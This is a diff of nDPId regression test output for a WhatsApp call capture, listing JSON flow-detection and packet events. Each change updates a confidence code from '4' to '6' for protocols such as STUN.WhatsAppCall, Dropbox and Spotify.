-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.91.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
+00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.91.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1432582238791,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238791,"pkt":"xiwDYGpkAPS5Jrv0CABFwACa90wAAEARRV3AqAIEHw1bMMk+DZYAhs2+AAMAaiESpEIAAJhbSrigEVALo05AAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":229,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1432582238791,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238791,"pkt":"xiwDYGpkAPS5Jrv0CABFwACahRkAAEARwwDAqAIEHw1PwMk+DZYAhkfEAAMAaiESpEIAADsyhsRFd5d2aQVAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":229,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":229,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1432582238792,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238792,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaCdEAAEARPknAqAIEHw1PwMk+DZYAhkfEAAMAaiESpEIAADsyhsRFd5d2aQVAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":231,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238792,"flow_last_seen":1432582238792,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238792,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1432582238792,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238792,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaWjwAAEAR4G3AqAIEHw1dMMk+DZYAhleUAAMAaiESpEIAAOhOyhcXEAbXGlxAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} 
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238792,"flow_last_seen":1432582238792,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238792,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238792,"flow_last_seen":1432582238792,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238792,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1432582238792,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238792,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaWaMAAEAR4QbAqAIEHw1dMMk+DZYAhleUAAMAaiESpEIAAOhOyhcXEAbXGlxAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} 
00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":233,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238792,"flow_last_seen":1432582238792,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238792,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1432582238792,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238792,"pkt":"xiwDYGpkAPS5Jrv0CABFwACagnUAAEARzDTAqAIEHw1JMMk+DZYAhhoqAAMAaiESpEIAABpmz0oddRqYGlZAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":233,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238792,"flow_last_seen":1432582238792,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238792,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
+00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":233,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238792,"flow_last_seen":1432582238792,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238792,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1432582238792,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238792,"pkt":"xiwDYGpkAPS5Jrv0CABFwACakcIAAEARvOfAqAIEHw1JMMk+DZYAhhoqAAMAaiESpEIAABpmz0oddRqYGlZAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1432582238857,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582238857,"pkt":"APS5Jrv0xiwDYGpkCABFAABI28gAAFURZ\/MfDUAwwKgCBA2WyT4ANKxZAQMAGCESpEIAAN5oNK0Wc\/NrxVUAIAAIAAGRdm4xsYdAAgAIAAABTYyOMnU="} 
00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1432582238878,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582238878,"pkt":"APS5Jrv0xiwDYGpkCABFAABIJlcAAFMRBGUfDVswwKgCBA2WyT4ANP0WAQMAGCESpEIAAJhbSrigEVALo04AIAAIAAGRdm4xsYdAAgAIAAABTYyOMoM="} 
@@ -148,10 +148,10 @@ 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1432582245576,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582245576,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAo\/ZBAAEAGBN\/AqAIEEaxkCMAPAbv4S5DkkuqnVFAQ\/\/\/yOQAA"} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582246280,"flow_last_seen":1432582246280,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582246280,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01131{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1432582246280,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1432582246280,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAISN8UAAEARusXAqAIBwKgC\/0RcRFwB\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"} 
-00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":281,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582246280,"flow_last_seen":1432582246280,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582246280,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":281,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582246280,"flow_last_seen":1432582246280,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582246280,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582247125,"flow_last_seen":1432582247125,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582247125,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1432582247125,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582247125,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABIu7MAAEAROKHAqAIBwKgC\/+EV4RUANKgAU3BvdFVkcDCYJeGQmjjiDQABAARIlcID1NylhjSgAeWF26p2NNVFJFGe2SE="} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582247125,"flow_last_seen":1432582247125,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582247125,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582247125,"flow_last_seen":1432582247125,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582247125,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582249235,"flow_last_seen":1432582249235,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582249235,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.62.150.157","src_port":49194,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1432582249235,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582249235,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0VdFAAEAGLmvAqAIEXT6WncAqAbtp\/2UpB8hbNoARIADD5gAAAQEICi36g7kNLSlg"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":296,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582249235,"flow_last_seen":1432582249235,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582249235,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49198,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -166,77 +166,77 @@ 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1432582250618,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582250618,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAotpxAAEAGIdPAqAIEEaeODcAwAbsLr3wlAQ2ywVAQ\/\/9P5QAA"} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":334,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582258587,"flow_last_seen":1432582258587,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582258587,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":51518,"dst_port":60312,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":334,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1432582258587,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582258587,"pkt":"xiwDYGpkAPS5Jrv0CABFwABIJ6AAAEARMxjAqAIEAcJav8k+65gANBimAAEAGCESpEI2xNtJG9sue8sIM0EACAAU5G1owzzn9g07DgjX0q3CWkGBWA0="} 
-00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":334,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582258587,"flow_last_seen":1432582258587,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582258587,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":51518,"dst_port":60312,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":334,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582258587,"flow_last_seen":1432582258587,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582258587,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":51518,"dst_port":60312,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":338,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582258730,"flow_last_seen":1432582258730,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582258730,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":51518,"dst_port":9344,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1432582258730,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582258730,"pkt":"xiwDYGpkAPS5Jrv0CABFwABIG0oAAEARj7DAqAIEW\/2wQck+JIAANKXrAAEAGCESpELdaIZ9jcVOA62tiygACAAUhE7qa\/gs1xldMnASKkUclFJWums="} -00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582258730,"flow_last_seen":1432582258730,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582258730,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":51518,"dst_port":9344,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
+00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582258730,"flow_last_seen":1432582258730,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582258730,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":51518,"dst_port":9344,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1432582258815,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582258815,"pkt":"APS5Jrv0xiwDYGpkCABFAABI4nIAAC8R2kdb\/bBBwKgCBCSAyT4ANOAtAQEAGCESpELdaIZ9jcVOA62tiygACAAUsHui2xBS6T5qw9kAv9V6SryCnE8="} 
